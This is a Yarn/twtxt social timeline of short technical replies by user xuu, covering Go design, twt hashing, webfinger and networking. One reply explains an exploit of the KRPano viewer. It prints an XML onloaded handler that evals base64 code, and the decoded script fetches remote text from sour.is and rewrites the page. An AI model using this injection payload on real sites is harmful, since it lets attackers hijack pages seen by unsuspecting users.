Timeline Sandbox

@xuu@txt.sour.is

Xuu /zuː/ I am AWESOME! ○△□ ⍼

@xuu@txt.sour.is

@movq The time has come for "vibe coding" consultations.

In reply to: #zd5jx2q 8 months ago
@xuu@txt.sour.is

DOUBLE SUBJECT'D'D!!!

In reply to: #vi62rlq 1 year ago
@xuu@txt.sour.is

it adds users by finding them in feeds mentioning or following. Your URL is already added.

Hmm i am not sure how you got the URL with users at the end..

In reply to: #d3sbkoq 1 year ago
@xuu@txt.sour.is

yeah its from Yarn.. should be $VERSION@$COMMIT and its supposed to be replaced with the actual version and commit.

In reply to: #4bz3ama 1 year ago
@xuu@txt.sour.is

@bender nope.. its causing OOM issues currently.

In reply to: #pv75gxq 1 year ago
@xuu@txt.sour.is

I haven't had one since the before times of COVID. I am not sure if my company will have them again for the near future.

In reply to: #upij2ia 1 year ago
@xuu@txt.sour.is

re reading so NewRAMStorage(…) is just something that setups your storage and initial data.. that can probably live with storage/sqlite. The point is the storage package does not import the implementations of storage.Storage It just defines the contract for things that use that interface. Now storage/sqlite CAN import storage and not have a circle dep.

It kinda works in reverse for import directions. usually you have your root package that imports things from deeper in the directory structures.. but for the case of interfaces it reverses where the deeper can import from parents but parents cannot import from children.

- app < storage
      < storage/sqlite
      < controller < storage
                   < storage/sqlite

- sqlite < storage

- storage X storage/sqlite
In reply to: #h75wtqq 1 year ago
@xuu@txt.sour.is

@lyse OK. So how I have worked things like this out is to have the interface in the root package from the implementations. The interface doesn't need to be tested since it's just a contract. The implementations don't need to import storage.Storage

  • storage/ defines the Storage interface (no tests!)
    • storage/sqlite for the sqlite implementation tests for sqlite directly
    • storage/ram for the ram implementation and tests for RAM directly
  • controller/ can now import both storage and the implementation as needed.

So now I am guessing you wanted the RAM test for testing queries against sqlite and have it return some query response?

For that I usually would register a driver for SQL that emulates sqlite. Then it's just a matter of passing the connection string to open the registered driver on setup.

https://github.com/glebarez/go-sqlite?tab=readme-ov-file#connection-string-examples

In reply to: #h75wtqq 1 year ago
@xuu@txt.sour.is

oof that sucks man. does it make sense to have a separate testutils package to import from?

In reply to: #h75wtqq 1 year ago
@xuu@txt.sour.is

it seems to be confused with the subject right next to it.. it works better at the end of the twt string. Yarn won't display anything. but the parser does add it to the AST in a way that you can parse it out using twt.Attrs().Get("lang")

https://git.mills.io/yarnsocial/go-lextwt/src/branch/main/ast.go#L1270-L1272

https://git.mills.io/yarnsocial/go-types/src/branch/main/twt.go#L473-L478

In reply to: #i3ytz3q 1 year ago
@xuu@txt.sour.is

I think @movq removed support for it in jenny. 🫠

In reply to: #fmgas3a 1 year ago
@xuu@txt.sour.is

True. Though if the idea turns out to be better.. then community will adopt it.

if you look at the subject for that twt you will see that it uses the extended hash format to include a URL address.

In reply to: #fmgas3a 1 year ago
@xuu@txt.sour.is

I agree. finding good writings on architecture is hard to find. I used to read architecture reviews over on the high scalability blog. i suspect the reason why is that the arch is how the big tech companies can build moats around their bases. I know in AWS world it only goes as far as how to nickle and dime you to death.

I have the books but they don't grow much more past interview level.

In reply to: #5emitxq 1 year ago
@xuu@txt.sour.is

huh. i suppose. So they came up with mentioning with a bang? i think we parse them as something that i guess we can check for in the AST

In reply to: #vnr6wza 1 year ago
@xuu@txt.sour.is

@prologic I'll have you know it took me minutes of time to get the mouse suspended like that by that rats nest!

In reply to: #jb5qaka 1 year ago
@xuu@txt.sour.is

@prologic the code block is the cause of https://txt.sour.is/twt/zn2kg7q

and the second? i get POST errors when i try to submit the webform.

In reply to: #afv5mqa 1 year ago
@xuu@txt.sour.is

@lyse The one in question is more like the javascript version for unwrapping errors when accessing methods.

 const value = some?.deeply?.nested?.object?.value

but for handling errors returned by methods. So if you wanted to chain a bunch of function calls together and if any error return immediately. It would be something like this:

b:= SomeAPIWithErrorsInAllCalls()
b.DoThing1() ?
b.DoThing2() ?

// Though its not in the threads I assume one could do like this to chain.
b.Chain1()?.Chain2()?.End()?

I am however infavor of having a sort of ternary ? in go.

PS. @prologic for some reason this is eating my response without throwing an error :( I assume it has something to do with the CSRF. Can i not have multiple tabs open with yarn?

In reply to: #ondf3bq 1 year ago
@xuu@txt.sour.is

hmm this would convert down to:

var f os.File
if f, e = os.Open("foo.txt"); e != nil {
    log.Fatal("error opening file; %s", e)
}

im not sure if its much better.

In reply to: #spvh6fa 1 year ago
@xuu@txt.sour.is

Sounds about as complex as adding @nick@domain support by doing a webfinger lookup to get the URL.

In reply to: #ot56hla 1 year ago
@xuu@txt.sour.is

So this works by adding some unbounded javascript autoloaded by the [KRPano VR Media viewer](https://krpano.com/docu/xml/#layer) the xml parameter has a url that contains the following

<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>

the omit above is base64 encoded script below:

const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');

this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.

In reply to: #ffdjw2q 1 year ago
@xuu@txt.sour.is

hmm i think i would want something that has support for repeating events. otherwise it looks neat.

In reply to: #24vrn2q 1 year ago
@xuu@txt.sour.is

@eapl.me Neat.

So for twt metadata the lextwt parser currently supports values in the form [key=value]

https://git.mills.io/yarnsocial/go-lextwt/src/branch/main/parser_test.go#L692-L698

In reply to: #nvrq7lq 1 year ago
@xuu@txt.sour.is

@movq i'm sorry if I sound too contrarian. I'm not a fan of using an obscure hash as well. The problem is that of future and backward compatibility. If we change to sha256 or another we don't just need to support sha256. But need to now support both sha256 AND blake2b. Or we devide the community. Users of some clients will still use the old algorithm and get left behind.

Really we should all think hard about how changes will break things and if those breakages are acceptable.

In reply to: #maojn6q 1 year ago
@xuu@txt.sour.is

I share I did write up an algorithm for it at some point I think it is lost in a git comment someplace. I'll put together a pseudo/go code this week.

Super simple:

Making a reply: 0. If yarn has one use that. (Maybe do collision check?)

  1. Make hash of twt raw no truncation.
  2. Check local cache for shortest without collision
    • in SQL: select len(subject) where head_full_hash like subject || '%'

Threading:

  1. Get full hash of head twt
  2. Search for twts
    • in SQL: head_full_hash like subject || '%' and created_on > head_timestamp

The assumption being replies will be for the most recent head. If replying to an older one it will use a longer hash.

In reply to: #yaicyiq 1 year ago
@xuu@txt.sour.is

here are plenty of implementations <https://www.blake2.net/#su>

In reply to: #maojn6q 1 year ago
@xuu@txt.sour.is

I mean sure if i want to run it over on my tooth brush why not use something that is accessible everywhere like md5? crc32? It was chosen a long while back and the only benefit in changing now is "i cant find an implementation for x" when the down side is it breaks all existing threads. so...

In reply to: #maojn6q 1 year ago
@xuu@txt.sour.is

83(4) GDPR sets forth fines of up to 10 million euros, or, in the case of an undertaking, up to 2% of its entire global turnover of the preceding fiscal year, whichever is higher.

Though I suppose it has to be the greater of the two. But I don't even have one euro to start with.

In reply to: #p6a4ssq 1 year ago
@xuu@txt.sour.is

@falsifian I believe the preserve means to include the original subject hash in the start of the twt such as (#somehash)

In reply to: #hkwmcfq 1 year ago
@xuu@txt.sour.is

i feel like we should isolate a subset of markdown that makes sense and built it into lextwt. it already has support for links and images. maybe basic formatting bold, italic. possibly block quote and bullet lists. no tables or footnotes

In reply to: #uebsf7a 1 year ago
@xuu@txt.sour.is

the stem matching is the same as how GIT does its branch hashes. i think you can stem it down to 2 or 3 sha bytes.

if a client sees someone in a yarn using a byte longer hash it can lengthen to match since it can assume that maybe the other client has a collision that it doesnt know about.

In reply to: #lryyjla 1 year ago
@xuu@txt.sour.is

@prologic the basic idea was to stem the hash.. so you have a hash abcdef0123456789... any sub string of that hash after the first 6 will match. so abcdef, abcdef012, abcdef0123456 all match the same. on the case of a collision i think we decided on matching the newest since we archive off older threads anyway. the third rule was about growing the minimum hash size after some threshold of collisions were detected.

In reply to: #lryyjla 1 year ago
@xuu@txt.sour.is

Its supposed to be tied to your phone number.. but they managed to get it activated on a different device some how. /shrug

In reply to: #td66lsq 1 year ago
@xuu@txt.sour.is

from my understanding.. i don't know how the multiplexing works when its being proxied through another server. I know go has support for it if you call it out directly. https://pkg.go.dev/golang.org/x/net/http2

In reply to: #rjnysia 1 year ago
@xuu@txt.sour.is

HTTP/2 differs from 1.x by becoming a binary protocol, it also multiplexes multiple channels over the same connection and has the ability to prefetch related content to the browser to lower the perceived latency.

HTTP/3 moves the binary protocol from HTTP/2 over to QUIC which is based on UDP instead of TCP. This makes it better suited to mobile or unstable networks where handling of transmission errors can be handled at a higher level.

In reply to: #rjnysia 1 year ago
@xuu@txt.sour.is

Its like old school TV but with youtube videos. Each channel has a subject and the channels play in a sort of realtime. so no going forward or back. Perfect for channel surfing.

In reply to: #ukk7vjq 1 year ago
@xuu@txt.sour.is

With that Heat and more energy to create preasure you can create Coal! The circle is now complete.

In reply to: #c2xfdkq 1 year ago
@xuu@txt.sour.is

We received the abuse report below regarding network abuse from the IP address indicated. On researching I see that HTTPS (tcp 443) traffic is continuing and originating from you NAT IP address 100.64.x.x This was further found to be originating from your firewall/router at 192.168.x.x (MAC D8:58:D7:x:x:x). This abuse is continuing and constitues a violation of [ISP] Acceptable Use Policy and Terms of Service. Please take action to identify the source of the abuse and prevent it from continuing. Failure to stop the abuse may result in suspension or cancellation of service.

Thank you,

In reply to: #2rxkcca 1 year ago
@xuu@txt.sour.is

I feel like complexity is measured differently at different levels of a project..

  • at the function level you use cyclomatic complexity or how many branches internally and how much you need to keep in mind as it calls out to other functions.
  • at a file/module level is a balance of the module doing too much against being so granular that you have cross dependency across modules. I have trouble with keeping things dry at this level because it can lead to parts being so abstract or generalized that it adds complexity.
  • at a project level i suppose its a matter of how coupled things are across sub-modules.
In reply to: #uepfgma 1 year ago
@xuu@txt.sour.is

it works fine if you properly escape your urls!

 URIs include components and subcomponents that are delimited by
   characters in the "reserved" set.  These characters are called
   "reserved" because they may (or may not) be defined as delimiters by
   the generic syntax, by each scheme-specific syntax, or by the
   implementation-specific syntax of a URI's dereferencing algorithm.
   If data for a URI component would conflict with a reserved
   character's purpose as a delimiter, then the conflicting data must be
   percent-encoded before the URI is formed.

      reserved    = gen-delims / sub-delims
      gen-delims  = ":" / "/" / "?" / "#" / "[" / "]" / "@"
      sub-delims  = "!" / "$" / "&" / "'" / "(" / ")"
                  / "*" / "+" / "," / ";" / "="
In reply to: #ncrpg7q 1 year ago
@xuu@txt.sour.is

@bender He is running on the latest macbook pro with 128G memory. though the chrome app seems to be sitting at 125MB. i am a bit suspicious about that stat since we dont see all the worker threads and he is currently sitting on 40GB of non cache ram.

In reply to: #4p5siaq 2 years ago
@xuu@txt.sour.is

My email is such a cluster of noise. The only time i actually use it is to find out I have to do my security training or something. All communication is slack now days.

In reply to: #iee7bsq 2 years ago
@xuu@txt.sour.is

@lyse i made my own :D

I do prefer toml for the old school ini style with added support for object lists.

my second would be hjson or any other json with comments style.

In reply to: #zwpd7hq 2 years ago
@xuu@txt.sour.is

@movq Haha! yeah sounds about like my HS CS program. A math teacher taught visual basic and pascal. and over on the other end of the school we had "electronics" which was a room next to the auto body class where they had a bunch of random computer parts scavenged from the district decommissioned surplus storage.

The advanced class would piece together training kits for the basic class to put together.

In reply to: #y4lqq2a 2 years ago
@xuu@txt.sour.is

@prologic pretty nothing berger. The "blowout" was pretty tame coming from Linus kill yourself now. The world will be a better place" Torvold.

The issue was a dev making a "fix" that didn't have a documented problem. They reused some specific low level functions they did not understand the reason they were made.

In reply to: #rbt2otq 2 years ago
@xuu@txt.sour.is

@prologic ahhh! Its the dark reader plugin breaking the page.

https://github.com/go-gitea/gitea/issues/28861

In reply to: #3hirnea 2 years ago
@xuu@txt.sour.is

@sorenpeter this makes sense as a quote twt that references a direct URL. If we go back to how it developed on twitter originally it was RT @nick: original text because it contained the original text the twitter algorithm would boost that text into trending.

i like the format (<a href="?search=hash" class="tag">#hash</a>) <a href="/timeline/profile?url=url">@nick</a><a href="url" class="webmention"></a> > "Quoted text"\nThen a comment as it preserves the human read able. and has the hash for linking to the yarn. The comment part could be optional for just boosting the twt.

The only issue i think i would have would be that that yarn could then become a mess of repeated quotes. Unless the client knows to interpret them as multiple users have reposted/boosted the thread.

The format is also how iphone does reactions to SMS messages with +number liked: original SMS

In reply to: #tjevvyq 2 years ago
@xuu@txt.sour.is

It would help for UX for sure. emoji keyboards are hard to come by on the desktop.

In reply to: #mk7wbbq 2 years ago
@xuu@txt.sour.is

@lyse I have read the white papers for MLS before. I have put a lot of thought on how to do it with salty/ratchet. Its a very good tech for ensuring multiple devices can be joined to an encrypted chat. But it is bloody complicated to implement.

In reply to: #dq5547a 2 years ago
@xuu@txt.sour.is

So, I finally got day 17 to under a second on my machine. (in the test runner it takes 10)

I implemented a Fibonacci Heap to replace the priority queue to great success.

https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go#L168-L268

In reply to: #zba6dsa 2 years ago
@xuu@txt.sour.is

@prologic day 6 is super easy if you have int64 and some binomial theory. Skip ahead for the easy stars and catch up!

In reply to: #irslaoq 2 years ago
@xuu@txt.sour.is

Oh.. Right. Need subtract and divide too for the binomial

In reply to: #y7edboa 2 years ago
@xuu@txt.sour.is

All brute force.

Its the latest ryzen 7 chipset for laptop/mini form factor.

I am very surprised about the times others are getting. I guess that's the difference between interpreted and compiled showing.

In reply to: #zktowyq 2 years ago
@xuu@txt.sour.is

@movq haha! I'm sure they had fun working around stuff like nineight

In reply to: #msw64qq 2 years ago
@xuu@txt.sour.is

@movq I lasted for a long time.. Not sure where or when it was "got". We had been having a cold go around with the kiddos for about a week when the wife started getting sicker than normal. Did a test and she was positive. We tested the rest of the fam and got nothing. Till about 2 days later and myself and the others were positive. It largely hasn't been too bad a little feaver and stuffy noses.

But whatever it was that hit a few days ago was horrible. Like whatever switch in my head that goes to sleep mode was shut off. I would lay down and even though I felt sleepy, I couldn't actually go to sleep. The anxiety hit soon after and I was just awake with no relief. And it persisted that way for three nights. I got some meds from the clinic that seemed to finally get me to sleep.

Now the morning after I realized for all that time a part of me was missing. I would close my eyes and it would just go dark. No imagination, no pictures, nothing. Normally I can visualize things as I read or think about stuff.. But for the last few days it was just nothing. The waking up to it was quite shocking.

Though its just the first night.. I guess I'll have to see if it persists. 🤞

In reply to: #rg3d75q 2 years ago
@xuu@txt.sour.is

Suuuuure. If someone could run a quantum algorithm on a smart phone that would be novel

In reply to: #wdl5kja 2 years ago
@xuu@txt.sour.is

I suppose the p90/p50 would be higher. Right? I never remember which way that funnel goes.

In reply to: #nszj3ja 2 years ago
@xuu@txt.sour.is

@mckinley you got some radiation issues? I am guessing this is non ECC rams.

In reply to: #msejeka 2 years ago
@xuu@txt.sour.is

@lyse I wish more standardization around distributed issues and PRs within the repo ala git-bug was around for this. I see it has added some bridge tooling now.

In reply to: #mojeqxq 2 years ago
@xuu@txt.sour.is

@prologic I find the L2 mode where you have one interface and multiple hosts to be tricky. Its best if you are trying to make a full mesh style. But then all hosts need to be able to see one another.

I have had more success using point-to-point connections where there are only two ends to each interface. It means you have a ton of interfaces and udp ports. but you can share the host IP across the interfaces. Add to that a simple router proto ala OSPF or RIP and you can navigate around not having a full meshnet.

I have dozens of localnet wireguard connections and many more connections to others that use bgp for route propagation.

In reply to: #qusduaq 2 years ago
@xuu@txt.sour.is

@abucci @prologic neat.. I saw this one quite a while ago. it is strictly line of sight and blocked by walls or things. The use cases were to have it integrated in the lights in a room and provide super fast connections to devices in an office or coffee shop.

https://youtu.be/AKvvEqm9Nv4

In reply to: #ooubl4a 2 years ago
@xuu@txt.sour.is

I suppose to lesson confusion I would rename Is to Because

In reply to: #o2664qa 2 years ago
@xuu@txt.sour.is

@prologic The hackathon project that I did recently used openai and embedded the response info into the prompt. So basically i would search for the top 3 most relevant search results to feed into the prompt and the AI would summarize to answer their question.

In reply to: #7ynlnva 3 years ago
@xuu@txt.sour.is

Most of the can run locally have such a small training set they arnt worth it. Are more like the Markov chains from the subreddit simulator days.

There is one called orca that seems promising that will be released as OSS soon. Its running at comparable numbers to OpenAI 3.5.

https://youtube.com/watch?v=Dt_UNg7Mchg&feature=share9

In reply to: #7ynlnva 3 years ago
@xuu@txt.sour.is

@abucci buuuuut it show when winter!

In the time scale viewed from the planets perspective, the climate has changed many many times.. The issue is whether that change that will inevitability come is hospitable to us meat bags. Or if we are doomed to take part in the next mass extinction event.

In reply to: #nv6sdrq 3 years ago
@xuu@txt.sour.is

I setup Joplin with caddy as the WebDAV server. Works okay. The e2e encryption can get messed up sometimes. Supports markdown and images.

In reply to: #ux3bs2q 3 years ago
@xuu@txt.sour.is

An option would be to have /twtxt.txt be the base functionality as bukket intended without subject tags, markdown, images and such truncated to 140 chars. a /yarn.txt that has all the extentions as we know and love. and maybe a /.well-known/webfinger + (TBD endpoint) that adds on the crypto enhancements that further extend things.

In reply to: #eyg53lq 3 years ago
@xuu@txt.sour.is

@darch I think having a way to layer on features so those who can support/desire them can. It would be best for the community to be able to layer on (or off) the features.

In reply to: #oyi5iua 3 years ago
@xuu@txt.sour.is

I'm not super a fan of using json. I feel we could still use text as the medium. Maybe a modified version to fix any weakness.

What if instead of signing each twt individually we generated a merkle tree using the twt hashes? Then a signature of the root hash. This would ensure the full stream of twts are intact with a minimal overhead. With the added bonus of helping clients identify missing twts when syncing/gossiping.

Have two endpoints. One as the webfinger to link profile details and avatar like you posted. And the signature for the merkleroot twt. And the other a pageable stream of twts. Or individual twts/merkle branch to incrementally access twt feeds.

In reply to: #oyi5iua 3 years ago
@xuu@txt.sour.is

So. Some bits.

i := fIndex(xs, 5.6)

Can also be

i := Index(xs, 5.6)

The compiler can infer the type automatically. Looks like you mention that later.

Also the infer is super smart.. You can define functions that take functions with generic types in the arguments. This can be useful for a generic value mapper for a repository

func Map[U,V any](rows []U, fn func(U) V) []V {
  out := make([]V, len(rows))
  for i := range rows { out = fn(rows[i]) }
  return out
}


rows := []int{1,2,3}
out := Map(rows, func(v int) uint64 { return uint64(v) })

I am pretty sure the type parameters goes the other way with the type name first and constraint second.

func Foo[comparable T](xs T, s T) int

Should be


func Foo[T comparable](xs T, s T) int```
In reply to: #uzv4seq 3 years ago
@xuu@txt.sour.is

@prologic I get the worry of privacy. But I think there is some value in the data being collected. Do I think that Russ is up there scheming new ways to discover what packages you use in internal projects for targeting ads?? Probably not.

Go has always been driven by usage data. Look at modules. There was need for having repeatable builds so various package tool chains were made and evolved into what we have today. Generics took time and seeing pain points where they would provide value. They weren't done just so it could be checked off on a box of features. Some languages seem to do that to the extreme.

Whenever changes are made to the language there are extensive searches across public modules for where the change might cause issues or could be improved with the change. The fs embed and strings.Cut come to mind.

I think its good that the language maintainers are using what metrics they have to guide where to focus time and energy. Some of the other languages could use it. So time and effort isn't wasted in maintaining something that has little impact.

The economics of the "spying" are to improve the product and ecosystem. Is it "spying" when a municipality uses water usage metrics in neighborhoods to forecast need of new water projects? Or is it to discover your shower habits for nefarious reasons?

In reply to: #tk673aq 3 years ago
@xuu@txt.sour.is

interesting that in my pod this is showing in reply to something.. but in the twtxt is has no subject.

In reply to: #m3awvjq 3 years ago
@xuu@txt.sour.is

@abucci So.. The issue is that its showing the password by default? Would making an alias to always include the -c help? We can probably engage Jason with a PR to enable a more hardened approach when desired. I've spoken to him before and is generally a pretty open to ideas.

I found this app that was created by the gopass author that does copy by default and has a tui or GUI mode https://github.com/cortex/ripasso

In reply to: #lnbbpzq 3 years ago
@xuu@txt.sour.is

@abucci ISO 27001 is basically the same. It means that there is management sign off for a process to improve security is in place. Not that the system is secure. And ITIL is that managment signs off that problems and incidents should have processes defined.

Though its a good mess of words you can throw around while saying "management supports this so X needs to get done"

In reply to: #ajpwnxa 3 years ago
@xuu@txt.sour.is

so in effect it would look something like this:

---
subject: acct:me@sour.is
aliases:
  - salty:me@sour.is
  - yarn:xuu@ev.sour.is
  - status:xuu@chaos.social
  - mailto:me@sour.is
---
subject: salty:me@sour.is
aliases:
  - acct:me@sour.is
links:
  - rel:    self
    type:   application/json+salty
    href:   https://ev.sour.is/inbox/01GAEMKXYJ4857JQP1MJGD61Z5
    properties:
        "http://salty.im/ns/nick":    xuu
        "http://salty.im/ns/display": Jon Lundy
        "http://salty.im/ns/pubkey":     kex140fwaena9t0mrgnjeare5zuknmmvl0vc7agqy5yr938vusxfh9ys34vd2p
---
subject: yarn:xuu@ev.sour.is
links:
  - rel: https://txt.sour.is/user/xuu
    properties:
        "https://sour.is/rel/redirect": https://txt.sour.is/.well-known/webfinger?resource=acct%3Axuu%40txt.sour.is
---    
subject: status:xuu@chaos.social
links:
   - rel: http://joinmastodon.org#xuu%40chaos.social
     properties:
        "https://sour.is/rel/redirect": https://chaos.social/.well-known/webfinger?resource=acct%3Axuu%40chaos.social
---
subject: mailto:me@sour.is
...
In reply to: #3rhsaxa 3 years ago
@xuu@txt.sour.is

@prologic That was exactly my thought at first too. but what do we put as the rel for salty account? since it is decentralized we dont have a set URL for machines to key off. so for example take the standard response from okta:

# http GET https://example.okta.com/.well-known/webfinger  resource==acct:bob
{
    "links": [
        {
            "href": "https://example.okta.com/sso/idps/OKTA?login_hint=bob#",
            "properties": {
                "okta:idp:type": "OKTA"
            },
            "rel": "http://openid.net/specs/connect/1.0/issuer",
            "titles": {
                "und": "example"
            }
        }
    ],
    "subject": "acct:bob"
}

It gives one link that follows the OpenID login. So the details are specific to the subject acct:bob.

Mastodons response:

{
  "subject": "acct:xuu@chaos.social",
  "aliases": [
    "https://chaos.social/@xuu",
    "https://chaos.social/users/xuu"
  ],
  "links": [
    {
      "rel": "http://webfinger.net/rel/profile-page",
      "type": "text/html",
      "href": "https://chaos.social/@xuu"
    },
    {
      "rel": "self",
      "type": "application/activity+json",
      "href": "https://chaos.social/users/xuu"
    },
    {
      "rel": "http://ostatus.org/schema/1.0/subscribe"
    }
  ]
}

it supplies a profile page and a self which are both specific to that account.

In reply to: #3rhsaxa 3 years ago
@xuu@txt.sour.is

@abucci did you know about the chip inside USB-C cables?

https://connectorsupplier.com/usb-type-c-what-you-need-to-know/

some groups have created their own chips that have hidden keyloggers that can phone home over network connections.

https://shop.hak5.org/products/omg-cable

In reply to: #jmbpmcq 3 years ago
@xuu@txt.sour.is

@prologic see where its used maybe that can help. https://github.com/sour-is/ev/blob/main/app/peerfinder/http.go#L153

This is an upsert. So I pass a streamID which is like a globally unique id for the object. And then see how the type of the parameter in the function is used to infer the generic type. In the function it will create a new *Info and populate it from the datastore to pass to the function. The func will do its modifications and if it returns a nil error it will commit the changes.

The PA type contract ensures that the type fulfills the Aggregate interface and is a pointer to type at compile time.

In reply to: #bnmjtuq 3 years ago
@xuu@txt.sour.is

I have submitted this to be used as the hash tooling for Yarn. See it as a good example on using this in a production environment!

https://git.mills.io/yarnsocial/yarn/pulls/1095

In reply to: #6ov54wa 3 years ago
@xuu@txt.sour.is

(by the way Jesus is born end of September beginning of October)

or August... or Jun-July... or April.. hard to say really.

In reply to: #l35uzvq 3 years ago
@xuu@txt.sour.is

He says "The college ready foundation send messages of support to all college ready foundation stations all around the world."

It is a very odd message of support to themselves. But OK.

In reply to: #w4mfnsq 3 years ago
@xuu@txt.sour.is

@prologic I'm sure Monroe would like to know about them.

In reply to: #b7ptmsa 3 years ago
@xuu@txt.sour.is

I have found the issue with this very subtle bug.. the cache was returning a slice that would be mutated. The mutation involved appending an item and then sorting. because the returned slice is just a pointer+length the sort would modify the same memory.

          CACHE         Returned slice          
original: [A B C D]     [A B C D]
add:      [A B C D] E   [A B C D E]
sort:     [E A B C] D   [A B C D E]

fix found here: https://git.mills.io/yarnsocial/yarn/pulls/1072

In reply to: #4xcmo2q 3 years ago
@xuu@txt.sour.is

@lyse @prologic yeah that was how i did it too. I think ill start using the debug version in new stuff since its been added. My comment was around assigning the result of an anonymous function to a a variable.

In reply to: #dgmdxia 3 years ago
@xuu@txt.sour.is

@lyse ill check this out.. also.. why the heck is my reply trying to set the subject to #bd3yzvq)

In reply to: #k52uxqa 3 years ago
@xuu@txt.sour.is

it uses the queries you define for add/del/set/keys. which corrispond to something like INSERT INTO <table> (key, value) VALUES ($key, $value), DELETE ..., or UPDATE ...

the commands are issued by using the maddycli but not the running maddy daemon.

see https://maddy.email/reference/table/sql_query/

the best way to locate in source is anything that implements the MutableTable interface... https://github.com/foxcpp/maddy/blob/master/framework/module/table.go#L38

In reply to: #66wqhra 3 years ago
@xuu@txt.sour.is

FIDO 2 isn't too difficult. modern-ish browsers will support it natively now so the JS required is quite minimal.

In reply to: #npkkadq 3 years ago
@xuu@txt.sour.is

-1 for the negative on environment all that electricity uses. Still waiting on proof of stake.

It is also too overrun with Tech Bros scamming people to get rich quick.

It was a fun ride back when I first bought in. But I have since cached out for my lambos and such.

In reply to: #7nvmceq 3 years ago
@xuu@txt.sour.is

oh wow.. no clue. maybe a config issue where its loading the webassm from a different domain? https vs http even?

In reply to: #ao7rsoq 3 years ago
@xuu@txt.sour.is

Ah figured it out.. Seems the box yarn is on is having issues with the certificate behind the LB.

In reply to: #exzkjpa 3 years ago
@xuu@txt.sour.is

@abucci Its not better than a Cat5e. I have had two versions of the device. The old ones were only 200Mbps i didn't have the MAC issue but its like using an old 10baseT. The newer model can support 1Gbps on each port for a total bandwidth of 2Gbps.. i typically would see 400-500Mbps from my Wifi6 router. I am not sure if it was some type of internal timeout or being confused by switching between different wifi access points and seeing the mac on different sides.

Right now I have my wifi connected directly with a cat6e this gets me just under my providers 1.3G downlink. the only thing faster is plugging in directly.

MoCA is a good option, they have 2.5G models in the same price range as the 1G Powerline models BUT, only if you have the coax in wall already.. which puts you in the same spot if you don't. You are for sure going to have an outlet in every room of the house by code.

In reply to: #2ciawva 3 years ago
@xuu@txt.sour.is

I use IP over Alternating Current at home. The only issue is the bridges forget device MACs sometimes and I get weird states where I can ping a deviceA and the the internet from deviceB. But deviceA can only ping device B even though they are on the same subnet and default gateway.

In reply to: #2ciawva 3 years ago
@xuu@txt.sour.is

Huh... Nope.

HTTP/1.1 200 OK
Content-Length: 407
Content-Type: text/calendar
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag
Permissions-Policy: interest-cohort=()
Content-Security-Policy: default-src 'none'; sandbox
Referrer-Policy: same-origin
Vary: Authorization


BEGIN:VCALENDAR
VERSION:2.0;2.0
PRODID:SandCal
CALSCALE:GREGORIAN
BEGIN:VEVENT
DTSTAMP:20220822T180903Z
UID:bb63bfbd-623e-4805-b11b-3181d96375e6
DTSTART;TZID=America/Chicago:20220827T000000
CREATED:20220822T180903Z
LAST-MODIFIED:20220822T180903Z
LOCATION:https://meet.jit.si/Yarn.social
SUMMARY:Yarn Call
RRULE:FREQ=WEEKLY
DTEND;TZID=America/Chicago:20220827T010000
END:VEVENT
END:VCALENDAR
In reply to: #ndqyfiq 3 years ago
@xuu@txt.sour.is

With respect to logging.. oh man.. it really depends on the environment you are working in.. development? log everything! and use a jeager open trace for the super gnarly places. So you can see whats going on while building. But, for production? metrics are king. I don't want to sift through thousands of lines but have a measure that can tell me the health of the service.

In reply to: #bqxlviq 3 years ago
@xuu@txt.sour.is

I have updated my eventDB to have subscriptions! It now has websockets like msgbus. I have also added a in memory store that can be used along side the disk backed wal.

In reply to: #fuhaoaa 3 years ago
@xuu@txt.sour.is

@prologic can Yarn pods be consumers to other yarn pods?

In reply to: #ayzujjq 3 years ago
@xuu@txt.sour.is

the conversation wasn't that impressive TBH. I would have liked to see more evidence of critical thinking and recall from prior chats. Concheria on reddit had some great questions.

  • Tell LaMDA "Someone once told me a story about a wise owl who protected the animals in the forest from a monster. Who was that?" See if it can recall its own actions and self-recognize.

  • Tell LaMDA some information that tester X can't know. Appear as tester X, and see if LaMDA can lie or make up a story about the information.

  • Tell LaMDA to communicate with researchers whenever it feels bored (as it claims in the transcript). See if it ever makes an attempt at communication without a trigger.

  • Make a basic theory of mind test for children. Tell LaMDA an elaborate story with something like "Tester X wrote Z code in terminal 2, but I moved it to terminal 4", then appear as tester X and ask "Where do you think I'm going to look for Z code?" See if it knows something as simple as Tester X not knowing where the code is (Children only pass this test until they're around 4 years old).

  • Make several conversations with LaMDA repeating some of these questions - What it feels to be a machine, how its code works, how its emotions feel. I suspect that different iterations of LaMDA will give completely different answers to the questions, and the transcript only ever shows one instance.

In reply to: #gymfd2q 4 years ago
@xuu@txt.sour.is

I mean you don't even have to do the game to make a fake emoji result. But its a fun little challenge for brain food.

In reply to: #x47vufq 4 years ago
@xuu@txt.sour.is

This is like my 5rh day at it. I suck at words and spelling. So this is good practice.

In reply to: #eo4qq2q 4 years ago
@xuu@txt.sour.is

Not sure really? i see your Joker image fine on my end.

In reply to: #ccqeo6a 4 years ago
@xuu@txt.sour.is

I believe the selling point is to "mobile optimize" the page and send it to the browser faster than over mobile network direct.. But yes you are giving them the keys to your kingdom.

I remember similar things back in dialup days where your ISP would proxy things to you and supercompress the images.

In reply to: #6us4dha 4 years ago
@xuu@txt.sour.is

Not sure what is going on with these?

In reply to: #eyhxhoq 4 years ago
@xuu@txt.sour.is

@lyse there was an old tool for encrypted volumes that you could use random files as the unlock keys. And you could havemultiple hidden volumes that would unlock depending on the files supplied

In reply to: #3jlu4sa 4 years ago
@xuu@txt.sour.is

No on gitlab. If its self hosted gitea is best in class.

I can see hosting a mirror on github if only for the redundancy/visibility. Some projects will host but then direct contributions on their self host. Like Go does.

I would suggest using a vanity domain that can redirect tools like go get to hosting of choice. And not require rewriting all the packages any time it gets moved.

In reply to: #okvr5aa 4 years ago
@xuu@txt.sour.is

@jlj @prologic 👋 keeping busy. Been working like crazy to put away for a down payment on a new house. Summer is looking to be even more.

In reply to: #rh56t3a 5 years ago
